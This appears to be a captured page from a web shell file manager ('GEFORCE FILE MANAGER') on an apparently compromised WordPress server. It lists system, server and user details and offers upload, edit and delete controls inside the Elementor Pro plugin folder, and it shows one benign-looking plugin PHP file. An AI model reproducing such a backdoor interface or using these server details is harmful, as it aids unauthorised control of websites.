[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor-pro
/
modules
/
link-in-bio
/
classes
/
render
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 icons-below-cta-render.php
706 B
SET
[ EDIT ]
|
[ DEL ]
📄 single-button-cta-render.php
1,002 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: icons-below-cta-render.php
<?php namespace ElementorPro\Modules\LinkInBio\Classes\Render; use Elementor\Modules\LinkInBio\Classes\Render\Render_Base; class Icons_Below_Cta_Render extends Render_Base { public function render(): void { $this->build_layout_render_attribute(); ?> <div <?php echo $this->widget->get_render_attribute_string( 'layout' ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>> <div class="e-link-in-bio__content"> <?php $this->render_identity_image(); $this->render_bio(); $this->render_ctas(); $this->render_icons(); ?> </div> <div class="e-link-in-bio__bg"> <div class="e-link-in-bio__bg-overlay"></div> </div> </div> <?php } }